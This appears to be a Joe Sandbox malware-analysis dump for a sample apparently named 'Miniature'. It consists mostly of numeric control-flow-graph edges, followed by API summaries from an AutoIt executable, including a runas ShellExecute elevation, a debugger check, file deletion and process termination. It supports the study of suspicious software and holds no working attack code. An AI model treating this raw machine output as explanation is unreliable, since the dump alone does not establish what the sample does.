API calls 102988->102989 102990 c156ac 102989->102990 102991 c1bf73 8 API calls 102990->102991 102992 c156b4 102991->102992 102993 c1bf73 8 API calls 102992->102993 102994 c156bc 102993->102994 102995 c156f0 102994->102995 102996 c54da1 102994->102996 102998 c1acc0 8 API calls 102995->102998 102997 c1bed9 8 API calls 102996->102997 102999 c54daa 102997->102999 103000 c156fe 102998->103000 103056 c1bd57 102999->103056 103052 c1adf4 103000->103052 103003 c15708 103004 c15733 103003->103004 103005 c1acc0 8 API calls 103003->103005 103006 c15754 103004->103006 103020 c15778 103004->103020 103023 c54dcc 103004->103023 103008 c15729 103005->103008 103012 c1655e 8 API calls 103006->103012 103006->103020 103010 c1adf4 8 API calls 103008->103010 103009 c15789 103011 c1579f 103009->103011 103015 c1bed9 8 API calls 103009->103015 103010->103004 103016 c1bed9 8 API calls 103011->103016 103018 c157b3 103011->103018 103013 c15761 103012->103013 103019 c1acc0 8 API calls 103013->103019 103013->103020 103015->103011 103016->103018 103017 c157be 103022 c1bed9 8 API calls 103017->103022 103026 c157c9 103017->103026 103018->103017 103021 c1bed9 8 API calls 103018->103021 103019->103020 103040 c1acc0 103020->103040 103021->103017 103022->103026 103062 c18577 103023->103062 103024 c1655e 8 API calls 103025 c54e8c 103024->103025 103025->103020 103025->103024 103074 c1ad40 8 API calls __fread_nolock 103025->103074 103026->102978 103029 c17bc7 103028->103029 103030 c5641d 103028->103030 103077 c17bd8 103029->103077 103087 c713c8 8 API calls __fread_nolock 103030->103087 103033 c17bd3 103033->102978 103034 c56427 103035 c1bed9 8 API calls 103034->103035 103036 c56433 103034->103036 103035->103036 103037->102978 103038->102981 103039->102985 103041 c1accf 103040->103041 103043 c1ace1 103040->103043 103042 c1c2c9 8 API calls 103041->103042 103050 c1acda __fread_nolock 103041->103050 103044 c605a3 __fread_nolock 103042->103044 103043->103041 103045 c60557 103043->103045 103046 c1ad07 
103043->103046 103047 c3014b 8 API calls 103045->103047 103075 c188e8 8 API calls 103046->103075 103049 c60561 103047->103049 103051 c3017b 8 API calls 103049->103051 103050->103009 103051->103041 103053 c1ae02 103052->103053 103054 c1ae0b __fread_nolock 103052->103054 103053->103054 103055 c1c2c9 8 API calls 103053->103055 103054->103003 103054->103054 103055->103054 103057 c1bd71 103056->103057 103061 c1bd64 103056->103061 103058 c3014b 8 API calls 103057->103058 103059 c1bd7b 103058->103059 103060 c3017b 8 API calls 103059->103060 103060->103061 103061->103004 103063 c56610 103062->103063 103064 c18587 _wcslen 103062->103064 103065 c1adf4 8 API calls 103063->103065 103067 c185c2 103064->103067 103068 c1859d 103064->103068 103066 c56619 103065->103066 103066->103066 103070 c3014b 8 API calls 103067->103070 103076 c188e8 8 API calls 103068->103076 103071 c185ce 103070->103071 103073 c3017b 8 API calls 103071->103073 103072 c185a5 __fread_nolock 103072->103025 103073->103072 103074->103025 103075->103050 103076->103072 103078 c17c1b __fread_nolock 103077->103078 103079 c17be7 103077->103079 103078->103033 103079->103078 103080 c5644e 103079->103080 103081 c17c0e 103079->103081 103083 c3014b 8 API calls 103080->103083 103088 c17d74 103081->103088 103084 c5645d 103083->103084 103085 c3017b 8 API calls 103084->103085 103086 c56491 __fread_nolock 103085->103086 103087->103034 103089 c17d8a 103088->103089 103092 c17d85 __fread_nolock 103088->103092 103090 c3017b 8 API calls 103089->103090 103091 c56528 103089->103091 103090->103092 103092->103078 103094 c3014b 8 API calls 103093->103094 103095 c2bc65 103094->103095 103096 c1b329 8 API calls 103095->103096 103097 c2bc70 103096->103097 103097->102704 103099 c13996 ___scrt_fastfail 103098->103099 103134 c15f32 103099->103134 103103 c13a1c 103104 c540cd Shell_NotifyIconW 103103->103104 103105 c13a3a Shell_NotifyIconW 103103->103105 103138 c161a9 103105->103138 103107 c13a50 103107->102715 103109 c13969 103108->103109 103110 
c13919 ___scrt_fastfail 103108->103110 103109->102715 103111 c13938 Shell_NotifyIconW 103110->103111 103111->103109 103113 c1c99e 103112->103113 103114 c1c9a5 103112->103114 103113->103114 103190 c36641 39 API calls _strftime 103113->103190 103114->102715 103116 c1c9e8 103116->102715 103118 c34da6 103117->103118 103119 c34e1b 103117->103119 103126 c34dcb 103118->103126 103191 c3f649 20 API calls __dosmaperr 103118->103191 103193 c34e2d 40 API calls 2 library calls 103119->103193 103122 c34e28 103122->102715 103123 c34db2 103192 c42b5c 26 API calls _strftime 103123->103192 103125 c34dbd 103125->102715 103126->102715 103128 c3017b 8 API calls 103127->103128 103129 c17afa 103128->103129 103130 c3014b 8 API calls 103129->103130 103131 c17b08 103130->103131 103131->102715 103132->102715 103133->102715 103135 c139eb 103134->103135 103136 c15f4e 103134->103136 103135->103103 103168 c7d11f 42 API calls _strftime 103135->103168 103136->103135 103137 c55070 DestroyIcon 103136->103137 103137->103135 103139 c161c6 103138->103139 103158 c162a8 103138->103158 103140 c17ad5 8 API calls 103139->103140 103141 c161d4 103140->103141 103142 c161e1 103141->103142 103143 c55278 LoadStringW 103141->103143 103144 c18577 8 API calls 103142->103144 103146 c55292 103143->103146 103145 c161f6 103144->103145 103147 c16203 103145->103147 103154 c552ae 103145->103154 103149 c1bed9 8 API calls 103146->103149 103152 c16229 ___scrt_fastfail 103146->103152 103147->103146 103148 c1620d 103147->103148 103169 c16b7c 103148->103169 103149->103152 103156 c1628e Shell_NotifyIconW 103152->103156 103153 c17bb5 8 API calls 103153->103152 103154->103152 103155 c552f1 103154->103155 103157 c1bf73 8 API calls 103154->103157 103179 c2fe6f 51 API calls 103155->103179 103156->103158 103159 c552d8 103157->103159 103158->103107 103178 c7a350 9 API calls 103159->103178 103162 c552e3 103164 c17bb5 8 API calls 103162->103164 103163 c55310 103165 c16b7c 8 API calls 103163->103165 103164->103155 103166 c55321 
103165->103166 103167 c16b7c 8 API calls 103166->103167 103167->103152 103168->103103 103170 c16b93 103169->103170 103171 c557fe 103169->103171 103180 c16ba4 103170->103180 103173 c3014b 8 API calls 103171->103173 103175 c55808 _wcslen 103173->103175 103174 c1621b 103174->103153 103176 c3017b 8 API calls 103175->103176 103177 c55841 __fread_nolock 103176->103177 103178->103162 103179->103163 103181 c16bb4 _wcslen 103180->103181 103182 c55860 103181->103182 103183 c16bc7 103181->103183 103185 c3014b 8 API calls 103182->103185 103184 c17d74 8 API calls 103183->103184 103186 c16bd4 __fread_nolock 103184->103186 103187 c5586a 103185->103187 103186->103174 103188 c3017b 8 API calls 103187->103188 103189 c5589a __fread_nolock 103188->103189 103190->103116 103191->103123 103192->103125 103193->103122 103195 c18ec0 52 API calls 103194->103195 103196 c989ed 103195->103196 103218 c98a32 messages 103196->103218 103232 c99730 103196->103232 103198 c98cde 103199 c98eac 103198->103199 103203 c98cec 103198->103203 103281 c99941 59 API calls 103199->103281 103202 c98ebb 103202->103203 103204 c98ec7 103202->103204 103245 c988e3 103203->103245 103204->103218 103205 c18ec0 52 API calls 103221 c98aa6 103205->103221 103210 c98d25 103259 c2ffe0 103210->103259 103213 c98d5f 103267 c17e12 103213->103267 103214 c98d45 103266 c83fe1 81 API calls __wsopen_s 103214->103266 103217 c98d50 GetCurrentProcess TerminateProcess 103217->103213 103218->102721 103221->103198 103221->103205 103221->103218 103264 c74ad3 8 API calls __fread_nolock 103221->103264 103265 c98f7a 41 API calls _strftime 103221->103265 103224 c98f22 103224->103218 103228 c98f36 FreeLibrary 103224->103228 103225 c98d9e 103279 c995d8 74 API calls 103225->103279 103228->103218 103230 c98daf 103230->103224 103231 c1b4c8 8 API calls 103230->103231 103280 c21ca0 8 API calls 103230->103280 103282 c995d8 74 API calls 103230->103282 103231->103230 103233 c1c2c9 8 API calls 103232->103233 103234 c9974b CharLowerBuffW 103233->103234 
103283 c79805 103234->103283 103238 c1bf73 8 API calls 103239 c99787 103238->103239 103240 c1acc0 8 API calls 103239->103240 103241 c9979b 103240->103241 103242 c1adf4 8 API calls 103241->103242 103244 c997a5 _wcslen 103242->103244 103243 c998bb _wcslen 103243->103221 103244->103243 103290 c98f7a 41 API calls _strftime 103244->103290 103246 c988fe 103245->103246 103250 c98949 103245->103250 103247 c3017b 8 API calls 103246->103247 103248 c98920 103247->103248 103249 c3014b 8 API calls 103248->103249 103248->103250 103249->103248 103251 c99af3 103250->103251 103252 c99d08 messages 103251->103252 103258 c99b17 _strcat _wcslen ___std_exception_copy 103251->103258 103252->103210 103253 c1c63f 39 API calls 103253->103258 103254 c1c98d 39 API calls 103254->103258 103255 c1ca5b 39 API calls 103255->103258 103256 c18ec0 52 API calls 103256->103258 103258->103252 103258->103253 103258->103254 103258->103255 103258->103256 103293 c7f8c5 10 API calls _wcslen 103258->103293 103260 c2fff5 103259->103260 103261 c3008d Sleep 103260->103261 103262 c3005b 103260->103262 103263 c3007b CloseHandle 103260->103263 103261->103262 103262->103213 103262->103214 103263->103262 103264->103221 103265->103221 103266->103217 103268 c17e1a 103267->103268 103269 c3014b 8 API calls 103268->103269 103270 c17e28 103269->103270 103294 c18445 103270->103294 103273 c18470 103297 c1c760 103273->103297 103275 c18480 103276 c3017b 8 API calls 103275->103276 103277 c1851c 103275->103277 103276->103277 103277->103230 103278 c21ca0 8 API calls 103277->103278 103278->103225 103279->103230 103280->103230 103281->103202 103282->103230 103284 c79825 _wcslen 103283->103284 103285 c79914 103284->103285 103287 c7985a 103284->103287 103289 c79919 103284->103289 103285->103238 103285->103244 103287->103285 103291 c2e36b 41 API calls 103287->103291 103289->103285 103292 c2e36b 41 API calls 103289->103292 103290->103243 103291->103287 103292->103289 103293->103258 103295 c3014b 8 API calls 103294->103295 103296 c17e30 
103295->103296 103296->103273 103298 c1c76b 103297->103298 103299 c61285 103298->103299 103304 c1c773 messages 103298->103304 103300 c3014b 8 API calls 103299->103300 103302 c61291 103300->103302 103301 c1c77a 103301->103275 103304->103301 103305 c1c7e0 8 API calls messages 103304->103305 103305->103304 103307 c1bf73 8 API calls 103306->103307 103308 c7dc73 103307->103308 103309 c1bf73 8 API calls 103308->103309 103310 c7dc7c 103309->103310 103311 c1bf73 8 API calls 103310->103311 103312 c7dc85 103311->103312 103330 c15851 103312->103330 103317 c7dcab 103319 c1568e 8 API calls 103317->103319 103318 c16b7c 8 API calls 103318->103317 103320 c7dcbf FindFirstFileW 103319->103320 103321 c7dd4b FindClose 103320->103321 103324 c7dcde 103320->103324 103326 c7dd56 103321->103326 103322 c7dd26 FindNextFileW 103322->103324 103323 c1bed9 8 API calls 103323->103324 103324->103321 103324->103322 103324->103323 103325 c17bb5 8 API calls 103324->103325 103327 c16b7c 8 API calls 103324->103327 103325->103324 103326->102726 103328 c7dd17 DeleteFileW 103327->103328 103328->103322 103329 c7dd42 FindClose 103328->103329 103329->103326 103342 c522d0 103330->103342 103333 c15898 103336 c1bd57 8 API calls 103333->103336 103334 c1587d 103335 c18577 8 API calls 103334->103335 103337 c15889 103335->103337 103336->103337 103344 c155dc 103337->103344 103340 c7eab0 GetFileAttributesW 103341 c7dc99 103340->103341 103341->103317 103341->103318 103343 c1585e GetFullPathNameW 103342->103343 103343->103333 103343->103334 103345 c155ea 103344->103345 103346 c1adf4 8 API calls 103345->103346 103347 c155fe 103346->103347 103347->103340 103380 c802aa 103348->103380 103351 c803f3 103396 c805e9 56 API calls __fread_nolock 103351->103396 103353 c80471 103356 c804a1 103353->103356 103357 c80507 103353->103357 103376 c80399 __fread_nolock 103353->103376 103354 c8040b 103354->103353 103355 c8041b 103354->103355 103360 c80453 103355->103360 103397 c82855 10 API calls 103355->103397 103361 c804d1 103356->103361 
103362 c804a6 103356->103362 103358 c805b0 103357->103358 103359 c80510 103357->103359 103358->103376 103405 c1c63f 39 API calls 103358->103405 103363 c8058d 103359->103363 103364 c80515 103359->103364 103387 c81844 103360->103387 103361->103376 103401 c1ca5b 39 API calls 103361->103401 103362->103376 103400 c1ca5b 39 API calls 103362->103400 103363->103376 103404 c1c63f 39 API calls 103363->103404 103366 c8051b 103364->103366 103367 c80554 103364->103367 103366->103376 103402 c1c63f 39 API calls 103366->103402 103367->103376 103403 c1c63f 39 API calls 103367->103403 103375 c80427 103398 c82855 10 API calls 103375->103398 103376->102736 103378 c8043e __fread_nolock 103399 c82855 10 API calls 103378->103399 103381 c802f7 103380->103381 103386 c802bb 103380->103386 103382 c1c98d 39 API calls 103381->103382 103384 c802f5 103382->103384 103383 c18ec0 52 API calls 103383->103386 103384->103351 103384->103354 103384->103376 103385 c34d98 _strftime 40 API calls 103385->103386 103386->103383 103386->103384 103386->103385 103388 c8184f 103387->103388 103389 c3014b 8 API calls 103388->103389 103390 c81856 103389->103390 103391 c81862 103390->103391 103392 c81883 103390->103392 103393 c3017b 8 API calls 103391->103393 103394 c3017b 8 API calls 103392->103394 103395 c8186b ___scrt_fastfail 103393->103395 103394->103395 103395->103376 103396->103376 103397->103375 103398->103378 103399->103360 103400->103376 103401->103376 103402->103376 103403->103376 103404->103376 103405->103376 103407 c3014b 8 API calls 103406->103407 103408 c1894a 103407->103408 103408->102826 103409->102822 103411 c18a76 103410->103411 103412 c56737 103411->103412 103419 c18a80 103411->103419 103425 c2b7a2 8 API calls 103412->103425 103413 c56744 103415 c1b4c8 8 API calls 103413->103415 103416 c56762 103415->103416 103416->103416 103417 c18b94 103418 c3014b 8 API calls 103417->103418 103420 c18b9b 103418->103420 103419->103413 103419->103417 103419->103420 103420->102822 103421->102784 103422->102807 
103423->102819 103424->102825 103425->103413 103427 c3017b 8 API calls 103426->103427 103428 c2c209 103427->103428 103429 c3014b 8 API calls 103428->103429 103430 c2c215 103429->103430 103430->102839 103432 c2fa35 103431->103432 103433 c2f9fe 103431->103433 103440 c2fe8a 8 API calls 103432->103440 103435 c3017b 8 API calls 103433->103435 103436 c2fa05 WideCharToMultiByte 103435->103436 103439 c2fa3e 8 API calls __fread_nolock 103436->103439 103438 c2fa29 103438->102843 103439->103438 103440->103438 103441->102886 103442->102870 103443->102886 103444->102887 103445->102886 103446->102624 103447->102624 103448->102631 103449->102625 103450 c61ac5 103451 c61acd 103450->103451 103454 c1d535 103450->103454 103496 c77a87 8 API calls __fread_nolock 103451->103496 103453 c61adf 103497 c77a00 8 API calls __fread_nolock 103453->103497 103457 c3014b 8 API calls 103454->103457 103456 c61b09 103458 c20340 207 API calls 103456->103458 103459 c1d589 103457->103459 103460 c61b30 103458->103460 103480 c1c32d 103459->103480 103461 c61b44 103460->103461 103498 c961a2 53 API calls _wcslen 103460->103498 103465 c3014b 8 API calls 103473 c1d66e messages 103465->103473 103466 c61b61 103466->103454 103499 c77a87 8 API calls __fread_nolock 103466->103499 103469 c1b4c8 8 API calls 103469->103473 103471 c1d9c3 103472 c61f79 103500 c756ae 8 API calls messages 103472->103500 103473->103469 103473->103472 103475 c61f94 103473->103475 103477 c1bed9 8 API calls 103473->103477 103478 c1c3ab 8 API calls 103473->103478 103479 c1d911 messages 103473->103479 103476 c1d9ac messages 103476->103471 103495 c2e30a 8 API calls messages 103476->103495 103477->103473 103478->103473 103479->103476 103487 c1c3ab 103479->103487 103484 c1c33d 103480->103484 103481 c1c345 103481->103465 103482 c3014b 8 API calls 103482->103484 103483 c1bf73 8 API calls 103483->103484 103484->103481 103484->103482 103484->103483 103485 c1bed9 8 API calls 103484->103485 103486 c1c32d 8 API calls 103484->103486 103485->103484 
103486->103484 103488 c1c3b9 103487->103488 103494 c1c3e1 messages 103487->103494 103489 c1c3c7 103488->103489 103490 c1c3ab 8 API calls 103488->103490 103491 c1c3cd 103489->103491 103492 c1c3ab 8 API calls 103489->103492 103490->103489 103491->103494 103501 c1c7e0 8 API calls messages 103491->103501 103492->103491 103494->103476 103495->103476 103496->103453 103497->103456 103498->103466 103499->103466 103500->103475 103501->103494 104165 c1f5e5 104166 c1cab0 207 API calls 104165->104166 104167 c1f5f3 104166->104167 103502 c11044 103507 c12793 103502->103507 103504 c1104a 103543 c30413 29 API calls __onexit 103504->103543 103506 c11054 103544 c12a38 103507->103544 103511 c1280a 103512 c1bf73 8 API calls 103511->103512 103513 c12814 103512->103513 103514 c1bf73 8 API calls 103513->103514 103515 c1281e 103514->103515 103516 c1bf73 8 API calls 103515->103516 103517 c12828 103516->103517 103518 c1bf73 8 API calls 103517->103518 103519 c12866 103518->103519 103520 c1bf73 8 API calls 103519->103520 103521 c12932 103520->103521 103554 c12dbc 103521->103554 103525 c12964 103526 c1bf73 8 API calls 103525->103526 103527 c1296e 103526->103527 103528 c23160 9 API calls 103527->103528 103529 c12999 103528->103529 103581 c13166 103529->103581 103531 c129b5 103532 c129c5 GetStdHandle 103531->103532 103533 c539e7 103532->103533 103534 c12a1a 103532->103534 103533->103534 103535 c539f0 103533->103535 103537 c12a27 OleInitialize 103534->103537 103536 c3014b 8 API calls 103535->103536 103538 c539f7 103536->103538 103537->103504 103588 c80ac4 InitializeCriticalSectionAndSpinCount InterlockedExchange GetCurrentProcess GetCurrentProcess DuplicateHandle 103538->103588 103540 c53a00 103589 c812eb CreateThread 103540->103589 103542 c53a0c CloseHandle 103542->103534 103543->103506 103590 c12a91 103544->103590 103547 c12a91 8 API calls 103548 c12a70 103547->103548 103549 c1bf73 8 API calls 103548->103549 103550 c12a7c 103549->103550 103551 c18577 8 API calls 103550->103551 103552 c127c9 
103551->103552 103553 c1327e 6 API calls 103552->103553 103553->103511 103555 c1bf73 8 API calls 103554->103555 103556 c12dcc 103555->103556 103557 c1bf73 8 API calls 103556->103557 103558 c12dd4 103557->103558 103597 c181d6 103558->103597 103561 c181d6 8 API calls 103562 c12de4 103561->103562 103563 c1bf73 8 API calls 103562->103563 103564 c12def 103563->103564 103565 c3014b 8 API calls 103564->103565 103566 c1293c 103565->103566 103567 c13205 103566->103567 103568 c13213 103567->103568 103569 c1bf73 8 API calls 103568->103569 103570 c1321e 103569->103570 103571 c1bf73 8 API calls 103570->103571 103572 c13229 103571->103572 103573 c1bf73 8 API calls 103572->103573 103574 c13234 103573->103574 103575 c1bf73 8 API calls 103574->103575 103576 c1323f 103575->103576 103577 c181d6 8 API calls 103576->103577 103578 c1324a 103577->103578 103579 c3014b 8 API calls 103578->103579 103580 c13251 RegisterWindowMessageW 103579->103580 103580->103525 103582 c13176 103581->103582 103583 c53c8f 103581->103583 103584 c3014b 8 API calls 103582->103584 103600 c83c4e 8 API calls 103583->103600 103586 c1317e 103584->103586 103586->103531 103587 c53c9a 103588->103540 103589->103542 103601 c812d1 14 API calls 103589->103601 103591 c1bf73 8 API calls 103590->103591 103592 c12a9c 103591->103592 103593 c1bf73 8 API calls 103592->103593 103594 c12aa4 103593->103594 103595 c1bf73 8 API calls 103594->103595 103596 c12a66 103595->103596 103596->103547 103598 c1bf73 8 API calls 103597->103598 103599 c12ddc 103598->103599 103599->103561 103600->103587 103602 c48782 103607 c4853e 103602->103607 103605 c487aa 103612 c4856f try_get_first_available_module 103607->103612 103609 c4876e 103626 c42b5c 26 API calls _strftime 103609->103626 103611 c486c3 103611->103605 103619 c50d04 103611->103619 103615 c486b8 103612->103615 103622 c3917b 40 API calls 2 library calls 103612->103622 103614 c4870c 103614->103615 103623 c3917b 40 API calls 2 library calls 103614->103623 103615->103611 103625 c3f649 20 API 
calls __dosmaperr 103615->103625 103617 c4872b 103617->103615 103624 c3917b 40 API calls 2 library calls 103617->103624 103627 c50401 103619->103627 103621 c50d1f 103621->103605 103622->103614 103623->103617 103624->103615 103625->103609 103626->103611 103630 c5040d ___BuildCatchObject 103627->103630 103628 c5041b 103685 c3f649 20 API calls __dosmaperr 103628->103685 103630->103628 103632 c50454 103630->103632 103631 c50420 103686 c42b5c 26 API calls _strftime 103631->103686 103638 c509db 103632->103638 103637 c5042a __fread_nolock 103637->103621 103688 c507af 103638->103688 103641 c50a26 103706 c45594 103641->103706 103642 c50a0d 103720 c3f636 20 API calls __dosmaperr 103642->103720 103645 c50a2b 103646 c50a34 103645->103646 103647 c50a4b 103645->103647 103722 c3f636 20 API calls __dosmaperr 103646->103722 103719 c5071a CreateFileW 103647->103719 103651 c50a39 103723 c3f649 20 API calls __dosmaperr 103651->103723 103652 c50a84 103654 c50b01 GetFileType 103652->103654 103656 c50ad6 GetLastError 103652->103656 103724 c5071a CreateFileW 103652->103724 103655 c50b0c GetLastError 103654->103655 103659 c50b53 103654->103659 103726 c3f613 20 API calls 2 library calls 103655->103726 103725 c3f613 20 API calls 2 library calls 103656->103725 103728 c454dd 21 API calls 3 library calls 103659->103728 103660 c50a12 103721 c3f649 20 API calls __dosmaperr 103660->103721 103661 c50b1a CloseHandle 103661->103660 103663 c50b43 103661->103663 103727 c3f649 20 API calls __dosmaperr 103663->103727 103665 c50ac9 103665->103654 103665->103656 103666 c50b74 103668 c50bc0 103666->103668 103729 c5092b 72 API calls 4 library calls 103666->103729 103673 c50bed 103668->103673 103730 c504cd 72 API calls 4 library calls 103668->103730 103669 c50b48 103669->103660 103672 c50be6 103672->103673 103674 c50bfe 103672->103674 103731 c48a2e 103673->103731 103676 c50478 103674->103676 103677 c50c7c CloseHandle 103674->103677 103687 c504a1 LeaveCriticalSection __wsopen_s 103676->103687 103746 c5071a 
CreateFileW 103677->103746 103679 c50ca7 103680 c50cb1 GetLastError 103679->103680 103681 c50cdd 103679->103681 103747 c3f613 20 API calls 2 library calls 103680->103747 103681->103676 103683 c50cbd 103748 c456a6 21 API calls 3 library calls 103683->103748 103685->103631 103686->103637 103687->103637 103689 c507ea 103688->103689 103690 c507d0 103688->103690 103749 c5073f 103689->103749 103690->103689 103756 c3f649 20 API calls __dosmaperr 103690->103756 103693 c507df 103757 c42b5c 26 API calls _strftime 103693->103757 103695 c50822 103696 c50851 103695->103696 103758 c3f649 20 API calls __dosmaperr 103695->103758 103705 c508a4 103696->103705 103760 c3da7d 26 API calls 2 library calls 103696->103760 103699 c50846 103759 c42b5c 26 API calls _strftime 103699->103759 103700 c5089f 103701 c5091e 103700->103701 103700->103705 103761 c42b6c 11 API calls _abort 103701->103761 103704 c5092a 103705->103641 103705->103642 103707 c455a0 ___BuildCatchObject 103706->103707 103764 c432d1 EnterCriticalSection 103707->103764 103709 c455a7 103711 c455cc 103709->103711 103715 c4563a EnterCriticalSection 103709->103715 103717 c455ee 103709->103717 103768 c45373 103711->103768 103714 c45617 __fread_nolock 103714->103645 103716 c45647 LeaveCriticalSection 103715->103716 103715->103717 103716->103709 103765 c4569d 103717->103765 103719->103652 103720->103660 103721->103676 103722->103651 103723->103660 103724->103665 103725->103660 103726->103661 103727->103669 103728->103666 103729->103668 103730->103672 103794 c45737 103731->103794 103733 c48a44 103807 c456a6 21 API calls 3 library calls 103733->103807 103734 c48a3e 103734->103733 103736 c45737 __wsopen_s 26 API calls 103734->103736 103745 c48a76 103734->103745 103738 c48a6d 103736->103738 103737 c45737 __wsopen_s 26 API calls 103739 c48a82 CloseHandle 103737->103739 103742 c45737 __wsopen_s 26 API calls 103738->103742 103739->103733 103743 c48a8e GetLastError 103739->103743 103740 c48abe 103740->103676 103741 c48a9c 103741->103740 

                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetVersionExW.KERNEL32(?), ref: 00C15FF7
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C18577: _wcslen.LIBCMT ref: 00C1858A
                                                                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(?,00CADC2C,00000000,?,?), ref: 00C16123
                                                                                                                                                                                                                                                                                            • IsWow64Process.KERNEL32(00000000,?,?), ref: 00C1612A
                                                                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00C16155
                                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00C16167
                                                                                                                                                                                                                                                                                            • GetNativeSystemInfo.KERNEL32(?,?,?), ref: 00C16175
                                                                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,?), ref: 00C1617C
                                                                                                                                                                                                                                                                                            • GetSystemInfo.KERNEL32(?,?,?), ref: 00C161A1
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
• Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
                                                                                                                                                                                                                                                                                            • String ID: GetNativeSystemInfo$kernel32.dll$|O
                                                                                                                                                                                                                                                                                            • API String ID: 3290436268-3101561225
                                                                                                                                                                                                                                                                                            • Opcode ID: cad0fa17876022bbc0b675732467ffe28d2453f18d641abe83985ceb8cf342ea
                                                                                                                                                                                                                                                                                            • Instruction ID: 1aba74db2dd5ec558644e6fd802662f42905c605e4d36de99f9f29147a70c734
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cad0fa17876022bbc0b675732467ffe28d2453f18d641abe83985ceb8cf342ea
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 24A1AF2694A6C4DFCB11CB797CC23ED7FAC6B27305B184899D4819B232C66D4988DF35

                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,00C13368,?), ref: 00C133BB
                                                                                                                                                                                                                                                                                            • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,00C13368,?), ref: 00C133CE
                                                                                                                                                                                                                                                                                            • GetFullPathNameW.KERNEL32(00007FFF,?,?,00CE2418,00CE2400,?,?,?,?,?,?,00C13368,?), ref: 00C1343A
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C18577: _wcslen.LIBCMT ref: 00C1858A
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C1425F: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00C13462,00CE2418,?,?,?,?,?,?,?,00C13368,?), ref: 00C142A0
                                                                                                                                                                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?,00000001,00CE2418,?,?,?,?,?,?,?,00C13368,?), ref: 00C134BB
                                                                                                                                                                                                                                                                                            • MessageBoxA.USER32(00000000,It is a violation of the AutoIt EULA to attempt to reverse engineer this program.,AutoIt,00000010), ref: 00C53CB0
                                                                                                                                                                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?,00CE2418,?,?,?,?,?,?,?,00C13368,?), ref: 00C53CF1
                                                                                                                                                                                                                                                                                            • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00CD31F4,00CE2418,?,?,?,?,?,?,?,00C13368), ref: 00C53D7A
                                                                                                                                                                                                                                                                                            • ShellExecuteW.SHELL32(00000000,?,?), ref: 00C53D81
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C134D3: GetSysColorBrush.USER32(0000000F), ref: 00C134DE
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C134D3: LoadCursorW.USER32(00000000,00007F00), ref: 00C134ED
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C134D3: LoadIconW.USER32(00000063), ref: 00C13503
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C134D3: LoadIconW.USER32(000000A4), ref: 00C13515
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C134D3: LoadIconW.USER32(000000A2), ref: 00C13527
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C134D3: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00C1353F
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C134D3: RegisterClassExW.USER32(?), ref: 00C13590
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C135B3: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00C135E1
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C135B3: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00C13602
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C135B3: ShowWindow.USER32(00000000,?,?,?,?,?,?,00C13368,?), ref: 00C13616
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C135B3: ShowWindow.USER32(00000000,?,?,?,?,?,?,00C13368,?), ref: 00C1361F
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C1396B: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00C13A3C
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            • It is a violation of the AutoIt EULA to attempt to reverse engineer this program., xrefs: 00C53CAA
                                                                                                                                                                                                                                                                                            • runas, xrefs: 00C53D75
                                                                                                                                                                                                                                                                                            • AutoIt, xrefs: 00C53CA5
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
